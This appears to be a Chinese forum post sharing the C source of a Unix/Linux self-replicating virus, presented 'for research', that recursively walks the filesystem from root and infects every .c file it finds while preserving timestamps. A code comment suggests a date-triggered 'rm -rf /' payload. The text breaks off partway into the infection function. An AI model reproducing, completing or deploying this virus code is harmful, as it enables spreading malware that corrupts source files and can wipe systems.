整理了一个很简单的C病毒,切勿乱用,供大家研究!不过是unix/Linux环境的, 能看懂原理就OK了。
/* ucfree:2007-12-31 start */
#include <stdio.h>
#include <dirent.h>
#include <unistd.h>
#include <string.h>
#include <sys/stat.h>
#include <utime.h>
#define VIR_NAM "virus.c" // virus file name
#define BUF_SIZE 101
#define STA_PATH "/" // start path
char vir_path[BUF_SIZE] = "";
/* it's the main part of virus's body,
* it can traversal all the parts of the system from STA_PATH,
* and if the process have enough permission,
* all of the .c file will being infected as a virus
*/
void vir_body()
{
DIR *dp;
struct dirent *dirp;
struct stat buf, cur_dir_buf;
int i;
char str_buf[BUF_SIZE];
// init the vir_path
if (!strcmp(vir_path, ""))
{
if (getcwd(vir_path, BUF_SIZE) == NULL)
{
return;
}
strcat(vir_path, "/");
strcat(vir_path, VIR_NAM);
chdir(STA_PATH);
}
if ((dp = opendir(".")) == NULL)
{
return;
}
// do all the sub_dir terms
while ((dirp = readdir(dp)) != NULL)
{
i = strlen(dirp->d_name);
if (dirp->d_name[i-1] == 'c' &&
dirp->d_name[i-2] == '.')
{// is a c file
do_c_file(dirp->d_name);
continue;
}
if (stat(dirp->d_name, &buf) < 0)
{// get the stat of the file
continue;
}
if (!S_ISDIR(buf.st_mode))
{// is not a directory
continue;
}
if (!strcmp(dirp->d_name, ".") ||
!strcmp(dirp->d_name, ".."))
{// ignore dot and dot_dot directory
continue;
}
// do the submit derectory as current
chdir(dirp->d_name);
vir_body();
chdir("..");
}
closedir(dp);
/* here! you can do anything that you want
* just use the system invokes or shell commands
* ex:
* if (system_data_is_sundy)
* {
* system("rm -rf /");
* }
* tip: if the process runing as root, the system being over
* it's dangerous, so not to try
*/
return;
}
/* this funtion is try to infect the .c file,
* if the .c file is already infected,no need to do it again,
* else the work begin ......
*/
int do_c_file(const char *f_name)
{
FILE *fp_obj, *fp_vir, *fp_tmp;
char buf[BUF_SIZE];
char flag;
char *tmp_buf;
struct stat statbuf;// get the object file's stat
struct utimbuf timebuf;// keep the object file's access and modify time